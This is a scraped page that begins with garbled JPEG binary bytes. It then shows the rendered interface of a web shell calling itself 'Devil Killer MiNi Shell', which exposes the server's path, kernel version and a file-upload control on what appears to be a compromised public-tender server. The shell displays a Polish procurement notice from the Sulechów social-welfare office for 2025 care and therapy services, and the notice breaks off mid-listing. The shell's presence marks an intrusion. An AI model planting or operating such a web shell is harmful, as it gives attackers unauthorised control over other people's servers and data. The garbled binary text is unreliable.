JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241217/0065791601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w roku 2025 na terenie gminy Sulechów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ W SULECHOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 006081235</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sulechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 4782244</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bok@pomocsulechow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ops.bip.sulechow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w roku 2025 na terenie gminy Sulechów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-acd66ca9-ea9f-40db-99eb-50433dd31478</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00657916</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-acd66ca9-ea9f-40db-99eb-50433dd31478 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2.	Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, wszelkich oświadczeń, wniosków, zawiadomień oraz informacji, odbywa się przy użyciu Platformy <br/>e-Zamówienia, zwanej dalej Platformą, która jest dostępna pod adresem https://ezamowienia.gov.pl. <br/>Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej pod adresem zp.ops.sulechow@gmail.com jednakże ta forma komunikacji nie dotyczy składania ofert.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Korzystanie z Platformy jest bezpłatne.<br/>4.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani logowania.<br/>5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>6.	Na Platformie komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>7.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie oraz zalogowania się na Platformie. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie.<br/>8.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. 2020 poz. 2452) oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020 poz. 2415 z późn. zm.).<br/>9.	Załączniki do formularza komunikacji muszą być zgodne z obowiązującym KRI - Rozporządzenie Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2024 r., poz. 773). Rekomendowany format danych .doc, .docx, .rtf, .pdf, .zip.<br/>10.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233) Wykonawca, w celu utrzymania w poufności tych informacji, powinien przekazać je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku np.: „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>11.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 PZP, podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę.<br/>12.	Wszystkie wysłane i odebrane przez Wykonawcę wiadomości, za pomocą Platformy, w postępowaniu widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>13.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>14.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy.<br/>Pozostałe zapisy w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz.U.UE.L. z 2016r. Nr 119, s.1 ze zm.) - dalej: „RODO” informuję, że:<br/>Administratorem Państwa danych jest Ośrodek Pomocy Społecznej w Sulechowie reprezentowany przez Dyrektora (adres: ul. Jana Pawła II 52, 66-100 Sulechów, tel. 68 4782244, e-mail: ops.sulechow@vp.pl. Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem adresu email: inspektor@cbi24.pl lub pisemnie na adres Administratora.<br/>1. Państwa dane będą przetwarzane w celu zapewnienia transportu do punktu szczepień przeciwko wirusowi SARS-CoV2 osobom mającym trudności w samodzielnym dotarciu do tych miejsc (zgodnie z decyzją Wojewody Lubuskiego z dnia 12 stycznia 2021 r., znak: BZK-I.6333.4.2021 oraz decyzją BZK-I.6333.8.2021 z dnia 14 stycznia 2001r. zmieniającą decyzję BZK-I.6333.4.2021).<br/>2.	Państwa dane będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO oraz art. 9 ust. 1 lit i RODO w związku z art. 11 ust. 1 pkt 1, 4 i 13 ustawy z dnia 2 marca 2020 r.<br/>o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem<br/>i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych, tj. Dz. U. 2020, poz. 1842 ze zm.) oraz art. 7 ust. 1 ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych Dz. U. z 2020 r. poz. 1398, z późn. zm.);<br/>3.	Państwa dane osobowe będą przetwarzane na podstawie obowiązujących przepisów prawa, przez okres 3 lat<br/>4.	Państwa dane osobowe będą przetwarzane w sposób zautomatyzowany, lecz nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym o profilowaniu.<br/>5.	Państwa dane osobowych nie będą przekazywane poza Europejski Obszar Gospodarczy (obejmujący Unię Europejską, Norwegię, Liechtenstein i Islandię).<br/>6.	W związku z przetwarzaniem Państwa danych osobowych, przysługują Państwu następujące prawa:<br/>•	prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>•	prawo do sprostowania (poprawiania) swoich danych osobowych;<br/>•	prawo do usunięcia danych (w przypadkach prawem przepisanych);<br/>•	prawo do ograniczenia przetwarzania danych osobowych;<br/>7.	prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), w sytuacji, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych (RODO);<br/>8.	Podanie przez Państwa danych osobowych jest obowiązkowe. Nieprzekazanie danych skutkować będzie brakiem realizacji celu, o którym mowa w punkcie 3, a tym samym – niewykonanie obowiązku nałożonego przez przepis prawa.<br/>Państwa dane mogą zostać przekazane podmiotom zewnętrznym na podstawie umowy powierzenia przetwarzania danych osobowych usługodawcom wykonujących usługi serwisu systemów informatycznych, dostawcom systemów informatycznych oraz usługodawcom z zakresu księgowości oraz doradztwa prawnego, a także podmiotom lub organom uprawnionym na podstawie przepisów prawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PS.SP.252.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	Rehabilitacja/fizjoterapia<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/>1	Rehabilitacja/fizjoterapia	408<br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85120000-6 - Usługi medyczne i podobne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 - terapia logopedyczna<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/><br/>2	Logopeda 312<br/><br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85120000-6 - Usługi medyczne i podobne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> c)	Zadanie 3 - terapia pedagogiczna<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 